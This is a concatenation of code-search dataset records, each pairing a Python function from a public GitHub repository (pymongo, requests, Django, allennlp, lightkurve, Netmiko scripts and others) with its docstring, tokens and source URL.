        self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
        self.max_len = max_len if max_len is not None else int(1e12)

function_tokens: [ "def", "__init__", "(", "self", ",", "vocab_file", ",", "do_lower_case", "=", "True", ",", "max_len", "=", "None", ",", "do_basic_tokenize", "=", "True", ",", "never_split", "=", "(", "\"[UNK]\"", ",", "\"[SEP]\"", ",", "\"[PAD]\"", ",", "\"[CLS]\"", ",", ...
url: https://github.com/airsplay/lxmert/blob/0db1182b9030da3ce41f17717cc628e1cd0a95d5/src/lxrt/tokenization.py#L75-L103
----
nwo: mongodb/mongo-python-driver
sha: c760f900f2e4109a247c2ffc8ad3549362007772
path: pymongo/message.py
language: python
identifier: _Query.as_command
parameters: (self, sock_info)
return_statement: return self._as_command
docstring: Return a find command document for this query.
docstring_summary: Return a find command document for this query.
docstring_tokens: [ "Return", "a", "find", "command", "document", "for", "this", "query", "." ]
function:

    def as_command(self, sock_info):
        """Return a find command document for this query."""
        # We use the command twice: on the wire and for command monitoring.
        # Generate it once, for speed and to avoid repeating side-effects.
        if self._as_command is not None:
            return self._as_command

        explain = '$explain' in self.spec
        cmd = _gen_find_command(
            self.coll, self.spec, self.fields, self.ntoskip,
            self.limit, self.batch_size, self.flags, self.read_concern,
            self.collation, self.session, self.allow_disk_use)
        if explain:
            self.name = 'explain'
            cmd = SON([('explain', cmd)])
        session = self.session
        sock_info.add_server_api(cmd)
        if session:
            session._apply_to(cmd, False, self.read_preference, sock_info)
            # Explain does not support readConcern.
            if not explain and not session.in_transaction:
                session._update_read_concern(cmd, sock_info)
        sock_info.send_cluster_time(cmd, session, self.client)
        # Support auto encryption
        client = self.client
        if client._encrypter and not client._encrypter._bypass_auto_encryption:
            cmd = client._encrypter.encrypt(self.db, cmd, self.codec_options)
        self._as_command = cmd, self.db
        return self._as_command

function_tokens: [ "def", "as_command", "(", "self", ",", "sock_info", ")", ":", "# We use the command twice: on the wire and for command monitoring.", "# Generate it once, for speed and to avoid repeating side-effects.", "if", "self", ".", "_as_command", "is", "not", "None", ":", "return", "self...
url: https://github.com/mongodb/mongo-python-driver/blob/c760f900f2e4109a247c2ffc8ad3549362007772/pymongo/message.py#L287-L315
----
nwo: FabriceSalvaire/PySpice
sha: 1fb97dc21abcf04cfd78802671322eef5c0de00b
path: PySpice/Spice/Parser_jmgc.py
language: python
identifier: SubCircuitStatement.params
parameters: (self)
return_statement: return self._params
docstring: Params of the sub-circuit.
docstring_summary: Params of the sub-circuit.
docstring_tokens: [ "Params", "of", "the", "sub", "-", "circuit", "." ]
function:

    def params(self):
        """Params of the sub-circuit."""
        return self._params

function_tokens: [ "def", "params", "(", "self", ")", ":", "return", "self", ".", "_params" ]
url: https://github.com/FabriceSalvaire/PySpice/blob/1fb97dc21abcf04cfd78802671322eef5c0de00b/PySpice/Spice/Parser_jmgc.py#L523-L525
----
nwo: ewels/MultiQC
sha: 9b953261d3d684c24eef1827a5ce6718c847a5af
path: multiqc/modules/somalier/somalier.py
language: python
identifier: MultiqcModule.parse_somalier_pairs_tsv
parameters: (self, f)
return_statement: return parsed_data
docstring: Parse csv output from somalier
docstring_summary: Parse csv output from somalier
docstring_tokens: [ "Parse", "csv", "output", "from", "somalier" ]
function:

    def parse_somalier_pairs_tsv(self, f):
        """Parse csv output from somalier"""
        parsed_data = dict()
        headers = None
        s_name_idx = None
        for l in f["f"].splitlines():
            s = l.lstrip("#").split("\t")
            if headers is None:
                headers = s
                try:
                    s_name_idx = [headers.index("sample_a"), headers.index("sample_b")]
                except ValueError:
                    log.warning("Could not find sample name in somalier output: {}".format(f["fn"]))
                    return None
            else:
                s_name = "*".join([s[idx] for idx in s_name_idx])  # not safe to hard code, but works
                parsed_data[s_name] = dict()
                for i, v in enumerate(s):
                    if i not in s_name_idx:  # Skip if (i == 0 or 1); i.e. sample_a, sample_b
                        if isnan(float(v)) or isinf(float(v)):
                            # TODO: find better solution
                            log.debug("Found Inf or NaN value. Overwriting with -2.")
                            v = -2
                        try:
                            # add the pattern as a suffix to key
                            parsed_data[s_name][headers[i]] = float(v)
                        except ValueError:
                            # add the pattern as a suffix to key
                            parsed_data[s_name][headers[i]] = v
        if len(parsed_data) == 0:
            return None
        return parsed_data

function_tokens: [ "def", "parse_somalier_pairs_tsv", "(", "self", ",", "f", ")", ":", "parsed_data", "=", "dict", "(", ")", "headers", "=", "None", "s_name_idx", "=", "None", "for", "l", "in", "f", "[", "\"f\"", "]", ".", "splitlines", "(", ")", ":", "s", "=", "l", ...
url: https://github.com/ewels/MultiQC/blob/9b953261d3d684c24eef1827a5ce6718c847a5af/multiqc/modules/somalier/somalier.py#L123-L155
----
nwo: aleju/imgaug
sha: 0101108d4fed06bc5056c4a03e2bcb0216dac326
path: imgaug/augmenters/geometric.py
language: python
identifier: _AffineMatrixGenerator.__init__
parameters: (self, matrix=None)
docstring_tokens: []
function:

    def __init__(self, matrix=None):
        if matrix is None:
            matrix = np.eye(3, dtype=np.float32)
        self.matrix = matrix

function_tokens: [ "def", "__init__", "(", "self", ",", "matrix", "=", "None", ")", ":", "if", "matrix", "is", "None", ":", "matrix", "=", "np", ".", "eye", "(", "3", ",", "dtype", "=", "np", ".", "float32", ")", "self", ".", "matrix", "=", "matrix" ]
url: https://github.com/aleju/imgaug/blob/0101108d4fed06bc5056c4a03e2bcb0216dac326/imgaug/augmenters/geometric.py#L619-L622
DataDog/integrations-core
934674b29d94b70ccc008f76ea172d0cdae05e1e
marklogic/datadog_checks/marklogic/config_models/defaults.py
python
instance_extra_headers
(field, value)
return get_default_field_value(field, value)
[]
def instance_extra_headers(field, value): return get_default_field_value(field, value)
[ "def", "instance_extra_headers", "(", "field", ",", "value", ")", ":", "return", "get_default_field_value", "(", "field", ",", "value", ")" ]
https://github.com/DataDog/integrations-core/blob/934674b29d94b70ccc008f76ea172d0cdae05e1e/marklogic/datadog_checks/marklogic/config_models/defaults.py#L69-L70
ambakick/Person-Detection-and-Tracking
f925394ac29b5cf321f1ce89a71b193381519a0b
utils/np_box_list_ops.py
python
iou
(boxlist1, boxlist2)
return np_box_ops.iou(boxlist1.get(), boxlist2.get())
Computes pairwise intersection-over-union between box collections. Args: boxlist1: BoxList holding N boxes boxlist2: BoxList holding M boxes Returns: a numpy array with shape [N, M] representing pairwise iou scores.
Computes pairwise intersection-over-union between box collections.
[ "Computes", "pairwise", "intersection", "-", "over", "-", "union", "between", "box", "collections", "." ]
def iou(boxlist1, boxlist2): """Computes pairwise intersection-over-union between box collections. Args: boxlist1: BoxList holding N boxes boxlist2: BoxList holding M boxes Returns: a numpy array with shape [N, M] representing pairwise iou scores. """ return np_box_ops.iou(boxlist1.get(), boxlist2.get())
[ "def", "iou", "(", "boxlist1", ",", "boxlist2", ")", ":", "return", "np_box_ops", ".", "iou", "(", "boxlist1", ".", "get", "(", ")", ",", "boxlist2", ".", "get", "(", ")", ")" ]
https://github.com/ambakick/Person-Detection-and-Tracking/blob/f925394ac29b5cf321f1ce89a71b193381519a0b/utils/np_box_list_ops.py#L65-L75
CamDavidsonPilon/lifelines
9be26a9a8720e8536e9828e954bb91d559a3016f
lifelines/fitters/__init__.py
python
ParametricUnivariateFitter.confidence_interval_cumulative_hazard_
(self)
return self.confidence_interval_
The confidence interval of the cumulative hazard. This is an alias for ``confidence_interval_``.
The confidence interval of the cumulative hazard. This is an alias for ``confidence_interval_``.
[ "The", "confidence", "interval", "of", "the", "cumulative", "hazard", ".", "This", "is", "an", "alias", "for", "confidence_interval_", "." ]
def confidence_interval_cumulative_hazard_(self) -> pd.DataFrame: """ The confidence interval of the cumulative hazard. This is an alias for ``confidence_interval_``. """ return self.confidence_interval_
[ "def", "confidence_interval_cumulative_hazard_", "(", "self", ")", "->", "pd", ".", "DataFrame", ":", "return", "self", ".", "confidence_interval_" ]
https://github.com/CamDavidsonPilon/lifelines/blob/9be26a9a8720e8536e9828e954bb91d559a3016f/lifelines/fitters/__init__.py#L1112-L1116
angr/angr
4b04d56ace135018083d36d9083805be8146688b
angr/analyses/cfg/segment_list.py
python
Segment.size
(self)
return self.end - self.start
Calculate the size of the Segment. :return: Size of the Segment. :rtype: int
Calculate the size of the Segment.
[ "Calculate", "the", "size", "of", "the", "Segment", "." ]
def size(self): """ Calculate the size of the Segment. :return: Size of the Segment. :rtype: int """ return self.end - self.start
[ "def", "size", "(", "self", ")", ":", "return", "self", ".", "end", "-", "self", ".", "start" ]
https://github.com/angr/angr/blob/4b04d56ace135018083d36d9083805be8146688b/angr/analyses/cfg/segment_list.py#L35-L42
emesene/emesene
4548a4098310e21b16437bb36223a7f632a4f7bc
emesene/e3/xmpp/SleekXMPP/sleekxmpp/plugins/base.py
python
BasePlugin.__setattr__
(self, key, value)
Provide direct assignment to configuration fields. If the standard configuration includes the option `'foo'`, then assigning to `self.foo` should be the same as assigning to `self.config['foo']`.
Provide direct assignment to configuration fields.
[ "Provide", "direct", "assignment", "to", "configuration", "fields", "." ]
def __setattr__(self, key, value): """Provide direct assignment to configuration fields. If the standard configuration includes the option `'foo'`, then assigning to `self.foo` should be the same as assigning to `self.config['foo']`. """ if key in self.default_config: self.config[key] = value else: super(BasePlugin, self).__setattr__(key, value)
[ "def", "__setattr__", "(", "self", ",", "key", ",", "value", ")", ":", "if", "key", "in", "self", ".", "default_config", ":", "self", ".", "config", "[", "key", "]", "=", "value", "else", ":", "super", "(", "BasePlugin", ",", "self", ")", ".", "__s...
https://github.com/emesene/emesene/blob/4548a4098310e21b16437bb36223a7f632a4f7bc/emesene/e3/xmpp/SleekXMPP/sleekxmpp/plugins/base.py#L306-L316
littlecodersh/MyPlatform
6f9a946605466f580205f6e9e96e533720fce578
vendor/requests/utils.py
python
unquote_header_value
(value, is_filename=False)
return value
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting. :param value: the header value to unquote.
r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting.
[ "r", "Unquotes", "a", "header", "value", ".", "(", "Reversal", "of", ":", "func", ":", "quote_header_value", ")", ".", "This", "does", "not", "use", "the", "real", "unquoting", "but", "what", "browsers", "are", "actually", "using", "for", "quoting", "." ]
def unquote_header_value(value, is_filename=False): r"""Unquotes a header value. (Reversal of :func:`quote_header_value`). This does not use the real unquoting but what browsers are actually using for quoting. :param value: the header value to unquote. """ if value and value[0] == value[-1] == '"': # this is not the real unquoting, but fixing this so that the # RFC is met will result in bugs with internet explorer and # probably some other browsers as well. IE for example is # uploading files with "C:\foo\bar.txt" as filename value = value[1:-1] # if this is a filename and the starting characters look like # a UNC path, then just return the value without quotes. Using the # replace sequence below on a UNC path has the effect of turning # the leading double slash into a single slash and then # _fix_ie_filename() doesn't work correctly. See #458. if not is_filename or value[:2] != '\\\\': return value.replace('\\\\', '\\').replace('\\"', '"') return value
[ "def", "unquote_header_value", "(", "value", ",", "is_filename", "=", "False", ")", ":", "if", "value", "and", "value", "[", "0", "]", "==", "value", "[", "-", "1", "]", "==", "'\"'", ":", "# this is not the real unquoting, but fixing this so that the", "# RFC i...
https://github.com/littlecodersh/MyPlatform/blob/6f9a946605466f580205f6e9e96e533720fce578/vendor/requests/utils.py#L264-L285
couchbase/couchbase-python-client
58ccfd42af320bde6b733acf094fd5a4cf34e0ad
couchbase_core/views/iterator.py
python
get_row_doc
(row_json)
return row_json.get('__DOCRESULT__')
Gets the document for the given parsed JSON row. Use this function in custom :class:`~.RowProcessor` implementations to extract the actual document. The document itself is stored within a private field of the row itself, and should only be accessed by this function. :param dict row_json: The parsed row (passed to the processor) :return: The document, or None
Gets the document for the given parsed JSON row.
[ "Gets", "the", "document", "for", "the", "given", "parsed", "JSON", "row", "." ]
def get_row_doc(row_json): """ Gets the document for the given parsed JSON row. Use this function in custom :class:`~.RowProcessor` implementations to extract the actual document. The document itself is stored within a private field of the row itself, and should only be accessed by this function. :param dict row_json: The parsed row (passed to the processor) :return: The document, or None """ return row_json.get('__DOCRESULT__')
[ "def", "get_row_doc", "(", "row_json", ")", ":", "return", "row_json", ".", "get", "(", "'__DOCRESULT__'", ")" ]
https://github.com/couchbase/couchbase-python-client/blob/58ccfd42af320bde6b733acf094fd5a4cf34e0ad/couchbase_core/views/iterator.py#L123-L135
allenai/allennlp
a3d71254fcc0f3615910e9c3d48874515edf53e0
allennlp/data/vocabulary.py
python
Vocabulary.__init__
( self, counter: Dict[str, Dict[str, int]] = None, min_count: Dict[str, int] = None, max_vocab_size: Union[int, Dict[str, int]] = None, non_padded_namespaces: Iterable[str] = DEFAULT_NON_PADDED_NAMESPACES, pretrained_files: Optional[Dict[str, str]] = None, only_include_pretrained_words: bool = False, tokens_to_add: Dict[str, List[str]] = None, min_pretrained_embeddings: Dict[str, int] = None, padding_token: Optional[str] = DEFAULT_PADDING_TOKEN, oov_token: Optional[str] = DEFAULT_OOV_TOKEN, )
[]
def __init__( self, counter: Dict[str, Dict[str, int]] = None, min_count: Dict[str, int] = None, max_vocab_size: Union[int, Dict[str, int]] = None, non_padded_namespaces: Iterable[str] = DEFAULT_NON_PADDED_NAMESPACES, pretrained_files: Optional[Dict[str, str]] = None, only_include_pretrained_words: bool = False, tokens_to_add: Dict[str, List[str]] = None, min_pretrained_embeddings: Dict[str, int] = None, padding_token: Optional[str] = DEFAULT_PADDING_TOKEN, oov_token: Optional[str] = DEFAULT_OOV_TOKEN, ) -> None: self._padding_token = padding_token if padding_token is not None else DEFAULT_PADDING_TOKEN self._oov_token = oov_token if oov_token is not None else DEFAULT_OOV_TOKEN self._non_padded_namespaces = set(non_padded_namespaces) self._token_to_index = _TokenToIndexDefaultDict( self._non_padded_namespaces, self._padding_token, self._oov_token ) self._index_to_token = _IndexToTokenDefaultDict( self._non_padded_namespaces, self._padding_token, self._oov_token ) self._retained_counter: Optional[Dict[str, Dict[str, int]]] = None # Made an empty vocabulary, now extend it. self._extend( counter, min_count, max_vocab_size, non_padded_namespaces, pretrained_files, only_include_pretrained_words, tokens_to_add, min_pretrained_embeddings, )
[ "def", "__init__", "(", "self", ",", "counter", ":", "Dict", "[", "str", ",", "Dict", "[", "str", ",", "int", "]", "]", "=", "None", ",", "min_count", ":", "Dict", "[", "str", ",", "int", "]", "=", "None", ",", "max_vocab_size", ":", "Union", "["...
https://github.com/allenai/allennlp/blob/a3d71254fcc0f3615910e9c3d48874515edf53e0/allennlp/data/vocabulary.py#L223-L260
lightkurve/lightkurve
70d1c4cd1ab30f24c83e54bdcea4dd16624bfd9c
src/lightkurve/targetpixelfile.py
python
TargetPixelFile.time
(self)
return Time( time_values, scale=self.hdu[1].header.get("TIMESYS", "tdb").lower(), format=time_format, )
Returns the time for all good-quality cadences.
Returns the time for all good-quality cadences.
[ "Returns", "the", "time", "for", "all", "good", "-", "quality", "cadences", "." ]
def time(self) -> Time: """Returns the time for all good-quality cadences.""" time_values = self.hdu[1].data["TIME"][self.quality_mask] # Some data products have missing time values; # we need to set these to zero or `Time` cannot be instantiated. time_values[~np.isfinite(time_values)] = 0 bjdrefi = self.hdu[1].header.get("BJDREFI") if bjdrefi == 2454833: time_format = "bkjd" elif bjdrefi == 2457000: time_format = "btjd" else: time_format = "jd" return Time( time_values, scale=self.hdu[1].header.get("TIMESYS", "tdb").lower(), format=time_format, )
[ "def", "time", "(", "self", ")", "->", "Time", ":", "time_values", "=", "self", ".", "hdu", "[", "1", "]", ".", "data", "[", "\"TIME\"", "]", "[", "self", ".", "quality_mask", "]", "# Some data products have missing time values;", "# we need to set these to zero...
https://github.com/lightkurve/lightkurve/blob/70d1c4cd1ab30f24c83e54bdcea4dd16624bfd9c/src/lightkurve/targetpixelfile.py#L319-L338
avocado-framework/avocado
1f9b3192e8ba47d029c33fe21266bd113d17811f
avocado/core/loader.py
python
SimpleFileLoader.discover
(self, reference, which_tests=DiscoverMode.DEFAULT)
return tests
Discover (possible) tests from a directory. Recursively walk in a directory and find tests params. The tests are returned in alphabetic order. Afterwards when "allowed_test_types" is supplied it verifies if all found tests are of the allowed type. If not return None (even on partial match). :param reference: the directory path to inspect. :param which_tests: Limit tests to be displayed :type which_tests: :class:`DiscoverMode` :return: list of matching tests
Discover (possible) tests from a directory.
[ "Discover", "(", "possible", ")", "tests", "from", "a", "directory", "." ]
def discover(self, reference, which_tests=DiscoverMode.DEFAULT): """ Discover (possible) tests from a directory. Recursively walk in a directory and find tests params. The tests are returned in alphabetic order. Afterwards when "allowed_test_types" is supplied it verifies if all found tests are of the allowed type. If not return None (even on partial match). :param reference: the directory path to inspect. :param which_tests: Limit tests to be displayed :type which_tests: :class:`DiscoverMode` :return: list of matching tests """ tests = self._discover(reference, which_tests) if self.test_type: mapping = self.get_type_label_mapping() test_class = next(key for key, value in mapping.items() if value == self.test_type) for tst in tests: if not self._is_matching_test_class(tst[0], test_class): return None return tests
[ "def", "discover", "(", "self", ",", "reference", ",", "which_tests", "=", "DiscoverMode", ".", "DEFAULT", ")", ":", "tests", "=", "self", ".", "_discover", "(", "reference", ",", "which_tests", ")", "if", "self", ".", "test_type", ":", "mapping", "=", "...
https://github.com/avocado-framework/avocado/blob/1f9b3192e8ba47d029c33fe21266bd113d17811f/avocado/core/loader.py#L396-L420
mesonbuild/meson
a22d0f9a0a787df70ce79b05d0c45de90a970048
mesonbuild/compilers/vala.py
python
ValaCompiler.get_werror_args
(self)
return ['--fatal-warnings']
[]
def get_werror_args(self) -> T.List[str]: return ['--fatal-warnings']
[ "def", "get_werror_args", "(", "self", ")", "->", "T", ".", "List", "[", "str", "]", ":", "return", "[", "'--fatal-warnings'", "]" ]
https://github.com/mesonbuild/meson/blob/a22d0f9a0a787df70ce79b05d0c45de90a970048/mesonbuild/compilers/vala.py#L71-L72
zbyte64/django-hyperadmin
9ac2ae284b76efb3c50a1c2899f383a27154cb54
hyperadmin/resources/endpoints.py
python
ResourceEndpoint.api_permission_check
(self, api_request, endpoint)
return self.resource.api_permission_check(api_request, endpoint)
[]
def api_permission_check(self, api_request, endpoint): return self.resource.api_permission_check(api_request, endpoint)
[ "def", "api_permission_check", "(", "self", ",", "api_request", ",", "endpoint", ")", ":", "return", "self", ".", "resource", ".", "api_permission_check", "(", "api_request", ",", "endpoint", ")" ]
https://github.com/zbyte64/django-hyperadmin/blob/9ac2ae284b76efb3c50a1c2899f383a27154cb54/hyperadmin/resources/endpoints.py#L59-L60
MrYsLab/pymata-aio
ccd1fd361d85a71cdde1c46cc733155ac43e93f7
pymata_aio/pymata3.py
python
PyMata3.encoder_read
(self, pin)
This method retrieves the latest encoder data value. It is a FirmataPlus feature. :param pin: Encoder Pin :returns: encoder data value
This method retrieves the latest encoder data value. It is a FirmataPlus feature.
[ "This", "method", "retrieves", "the", "latest", "encoder", "data", "value", ".", "It", "is", "a", "FirmataPlus", "feature", "." ]
def encoder_read(self, pin): """ This method retrieves the latest encoder data value. It is a FirmataPlus feature. :param pin: Encoder Pin :returns: encoder data value """ try: task = asyncio.ensure_future(self.core.encoder_read(pin)) value = self.loop.run_until_complete(task) return value except RuntimeError: self.shutdown()
[ "def", "encoder_read", "(", "self", ",", "pin", ")", ":", "try", ":", "task", "=", "asyncio", ".", "ensure_future", "(", "self", ".", "core", ".", "encoder_read", "(", "pin", ")", ")", "value", "=", "self", ".", "loop", ".", "run_until_complete", "(", ...
https://github.com/MrYsLab/pymata-aio/blob/ccd1fd361d85a71cdde1c46cc733155ac43e93f7/pymata_aio/pymata3.py#L201-L215
accel-brain/accel-brain-code
86f489dc9be001a3bae6d053f48d6b57c0bedb95
Accel-Brain-Base/accelbrainbase/iteratabledata/_mxnet/labeled_csv_iterator.py
python
LabeledCSVIterator.generate_inferenced_samples
(self)
Draw and generate data. The targets will be drawn from all image file sorted in ascending order by file name. Returns: `Tuple` data. The shape is ... - `None`. - `None`. - `mxnet.ndarray` of observed data points in test. - file path.
Draw and generate data. The targets will be drawn from all image file sorted in ascending order by file name.
[ "Draw", "and", "generate", "data", ".", "The", "targets", "will", "be", "drawn", "from", "all", "image", "file", "sorted", "in", "ascending", "order", "by", "file", "name", "." ]
def generate_inferenced_samples(self): ''' Draw and generate data. The targets will be drawn from all image file sorted in ascending order by file name. Returns: `Tuple` data. The shape is ... - `None`. - `None`. - `mxnet.ndarray` of observed data points in test. - file path. ''' for i in range(1, self.__test_observed_arr.shape[0] // self.batch_size): test_batch_arr = self.__test_observed_arr[(i-1)*self.batch_size:i*self.batch_size] yield None, None, test_batch_arr, None
[ "def", "generate_inferenced_samples", "(", "self", ")", ":", "for", "i", "in", "range", "(", "1", ",", "self", ".", "__test_observed_arr", ".", "shape", "[", "0", "]", "//", "self", ".", "batch_size", ")", ":", "test_batch_arr", "=", "self", ".", "__test...
https://github.com/accel-brain/accel-brain-code/blob/86f489dc9be001a3bae6d053f48d6b57c0bedb95/Accel-Brain-Base/accelbrainbase/iteratabledata/_mxnet/labeled_csv_iterator.py#L121-L135
garywiz/chaperone
9ff2c3a5b9c6820f8750320a564ea214042df06f
chaperone/cutil/notify.py
python
NotifyListener.__init__
(self, socket_name, **kwargs)
[]
def __init__(self, socket_name, **kwargs): super().__init__(**kwargs) self._socket_name = socket_name
[ "def", "__init__", "(", "self", ",", "socket_name", ",", "*", "*", "kwargs", ")", ":", "super", "(", ")", ".", "__init__", "(", "*", "*", "kwargs", ")", "self", ".", "_socket_name", "=", "socket_name" ]
https://github.com/garywiz/chaperone/blob/9ff2c3a5b9c6820f8750320a564ea214042df06f/chaperone/cutil/notify.py#L42-L44
AppScale/gts
46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9
AppServer/google/appengine/api/app_logging.py
python
AppLogsHandler._AppLogsMessage
(self, record)
return "LOG %d %d %s\n" % (self._AppLogsLevel(record.levelno), long(record.created * 1000 * 1000), message)
Converts the log record into a log line.
Converts the log record into a log line.
[ "Converts", "the", "log", "record", "into", "a", "log", "line", "." ]
def _AppLogsMessage(self, record): """Converts the log record into a log line.""" message = self.format(record).replace("\r\n", NEWLINE_REPLACEMENT) message = message.replace("\r", NEWLINE_REPLACEMENT) message = message.replace("\n", NEWLINE_REPLACEMENT) return "LOG %d %d %s\n" % (self._AppLogsLevel(record.levelno), long(record.created * 1000 * 1000), message)
[ "def", "_AppLogsMessage", "(", "self", ",", "record", ")", ":", "message", "=", "self", ".", "format", "(", "record", ")", ".", "replace", "(", "\"\\r\\n\"", ",", "NEWLINE_REPLACEMENT", ")", "message", "=", "message", ".", "replace", "(", "\"\\r\"", ",", ...
https://github.com/AppScale/gts/blob/46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9/AppServer/google/appengine/api/app_logging.py#L88-L99
dstamoulis/single-path-nas
21c1f3e9c790e591749c0fb861bff3737b6d5fc7
runtime-modeling/imagenet_input.py
python
ImageNetTFExampleInput.dataset_parser
(self, value)
return image, label
Parses an image and its label from a serialized ResNet-50 TFExample. Args: value: serialized string containing an ImageNet TFExample. Returns: Returns a tuple of (image, label) from the TFExample.
Parses an image and its label from a serialized ResNet-50 TFExample.
[ "Parses", "an", "image", "and", "its", "label", "from", "a", "serialized", "ResNet", "-", "50", "TFExample", "." ]
def dataset_parser(self, value): """Parses an image and its label from a serialized ResNet-50 TFExample. Args: value: serialized string containing an ImageNet TFExample. Returns: Returns a tuple of (image, label) from the TFExample. """ keys_to_features = { 'image/encoded': tf.FixedLenFeature((), tf.string, ''), 'image/class/label': tf.FixedLenFeature([], tf.int64, -1), } parsed = tf.parse_single_example(value, keys_to_features) image_bytes = tf.reshape(parsed['image/encoded'], shape=[]) image = self.image_preprocessing_fn( image_bytes=image_bytes, is_training=self.is_training, image_size=self.image_size, use_bfloat16=self.use_bfloat16) # Subtract one so that labels are in [0, 1000). label = tf.cast( tf.reshape(parsed['image/class/label'], shape=[]), dtype=tf.int32) - 1 return image, label
[ "def", "dataset_parser", "(", "self", ",", "value", ")", ":", "keys_to_features", "=", "{", "'image/encoded'", ":", "tf", ".", "FixedLenFeature", "(", "(", ")", ",", "tf", ".", "string", ",", "''", ")", ",", "'image/class/label'", ":", "tf", ".", "FixedL...
https://github.com/dstamoulis/single-path-nas/blob/21c1f3e9c790e591749c0fb861bff3737b6d5fc7/runtime-modeling/imagenet_input.py#L91-L118
lad1337/XDM
0c1b7009fe00f06f102a6f67c793478f515e7efe
site-packages/requests/packages/urllib3/filepost.py
python
choose_boundary
()
return uuid4().hex
Our embarassingly-simple replacement for mimetools.choose_boundary.
Our embarassingly-simple replacement for mimetools.choose_boundary.
[ "Our", "embarassingly", "-", "simple", "replacement", "for", "mimetools", ".", "choose_boundary", "." ]
def choose_boundary(): """ Our embarassingly-simple replacement for mimetools.choose_boundary. """ return uuid4().hex
[ "def", "choose_boundary", "(", ")", ":", "return", "uuid4", "(", ")", ".", "hex" ]
https://github.com/lad1337/XDM/blob/0c1b7009fe00f06f102a6f67c793478f515e7efe/site-packages/requests/packages/urllib3/filepost.py#L20-L24
ctxis/CAPE
dae9fa6a254ecdbabeb7eb0d2389fa63722c1e82
lib/maec/maec41.py
python
regStringToHive
(reg_string)
return normalized_key.split("\\")[0]
Maps a string representing a Registry Key from a NT* API call input to its normalized hive
Maps a string representing a Registry Key from a NT* API call input to its normalized hive
[ "Maps", "a", "string", "representing", "a", "Registry", "Key", "from", "a", "NT", "*", "API", "call", "input", "to", "its", "normalized", "hive" ]
def regStringToHive(reg_string): """Maps a string representing a Registry Key from a NT* API call input to its normalized hive""" normalized_key = fix_key(reg_string) return normalized_key.split("\\")[0]
[ "def", "regStringToHive", "(", "reg_string", ")", ":", "normalized_key", "=", "fix_key", "(", "reg_string", ")", "return", "normalized_key", ".", "split", "(", "\"\\\\\"", ")", "[", "0", "]" ]
https://github.com/ctxis/CAPE/blob/dae9fa6a254ecdbabeb7eb0d2389fa63722c1e82/lib/maec/maec41.py#L1623-L1626
Azure/azure-linux-extensions
a42ef718c746abab2b3c6a21da87b29e76364558
OSPatching/azure/servicemanagement/__init__.py
python
_management_error_handler
(http_error)
return _general_error_handler(http_error)
Simple error handler for management service.
Simple error handler for management service.
[ "Simple", "error", "handler", "for", "management", "service", "." ]
def _management_error_handler(http_error): ''' Simple error handler for management service. ''' return _general_error_handler(http_error)
[ "def", "_management_error_handler", "(", "http_error", ")", ":", "return", "_general_error_handler", "(", "http_error", ")" ]
https://github.com/Azure/azure-linux-extensions/blob/a42ef718c746abab2b3c6a21da87b29e76364558/OSPatching/azure/servicemanagement/__init__.py#L1334-L1336
ktbyers/pynet
f01ca44afe1db1e64828fc93028f67410174719e
pyth_ans_ecourse/class8/ex8_proc_w_queue.py
python
show_version_queue
(a_device, output_q)
Use Netmiko to execute show version. Use a queue to pass the data back to the main process.
Use Netmiko to execute show version. Use a queue to pass the data back to the main process.
[ "Use", "Netmiko", "to", "execute", "show", "version", ".", "Use", "a", "queue", "to", "pass", "the", "data", "back", "to", "the", "main", "process", "." ]
def show_version_queue(a_device, output_q): ''' Use Netmiko to execute show version. Use a queue to pass the data back to the main process. ''' output_dict = {} creds = a_device.credentials remote_conn = ConnectHandler(device_type=a_device.device_type, ip=a_device.ip_address, username=creds.username, password=creds.password, port=a_device.port, secret='', verbose=False) output = ('#' * 80) + "\n" output += remote_conn.send_command_expect("show version") + "\n" output += ('#' * 80) + "\n" output_dict[a_device.device_name] = output output_q.put(output_dict)
[ "def", "show_version_queue", "(", "a_device", ",", "output_q", ")", ":", "output_dict", "=", "{", "}", "creds", "=", "a_device", ".", "credentials", "remote_conn", "=", "ConnectHandler", "(", "device_type", "=", "a_device", ".", "device_type", ",", "ip", "=", ...
https://github.com/ktbyers/pynet/blob/f01ca44afe1db1e64828fc93028f67410174719e/pyth_ans_ecourse/class8/ex8_proc_w_queue.py#L16-L32
AppScale/gts
46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9
AppServer/lib/django-1.2/django/db/backends/__init__.py
python
BaseDatabaseOperations.last_executed_query
(self, cursor, sql, params)
return smart_unicode(sql) % u_params
Returns a string of the query last executed by the given cursor, with placeholders replaced with actual values. `sql` is the raw query containing placeholders, and `params` is the sequence of parameters. These are used by default, but this method exists for database backends to provide a better implementation according to their own quoting schemes.
Returns a string of the query last executed by the given cursor, with placeholders replaced with actual values.
[ "Returns", "a", "string", "of", "the", "query", "last", "executed", "by", "the", "given", "cursor", "with", "placeholders", "replaced", "with", "actual", "values", "." ]
def last_executed_query(self, cursor, sql, params): """ Returns a string of the query last executed by the given cursor, with placeholders replaced with actual values. `sql` is the raw query containing placeholders, and `params` is the sequence of parameters. These are used by default, but this method exists for database backends to provide a better implementation according to their own quoting schemes. """ from django.utils.encoding import smart_unicode, force_unicode # Convert params to contain Unicode values. to_unicode = lambda s: force_unicode(s, strings_only=True, errors='replace') if isinstance(params, (list, tuple)): u_params = tuple([to_unicode(val) for val in params]) else: u_params = dict([(to_unicode(k), to_unicode(v)) for k, v in params.items()]) return smart_unicode(sql) % u_params
[ "def", "last_executed_query", "(", "self", ",", "cursor", ",", "sql", ",", "params", ")", ":", "from", "django", ".", "utils", ".", "encoding", "import", "smart_unicode", ",", "force_unicode", "# Convert params to contain Unicode values.", "to_unicode", "=", "lambda...
https://github.com/AppScale/gts/blob/46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9/AppServer/lib/django-1.2/django/db/backends/__init__.py#L197-L216
sfu-db/dataprep
6dfb9c659e8bf73f07978ae195d0372495c6f118
dataprep/clean/clean_address.py
python
_clean_zip
(result_dict: Dict[str, str], zipcode: str)
adds zipcode to result_dict
adds zipcode to result_dict
[ "adds", "zipcode", "to", "result_dict" ]
def _clean_zip(result_dict: Dict[str, str], zipcode: str) -> None: """ adds zipcode to result_dict """ result_dict["zipcode"] = zipcode
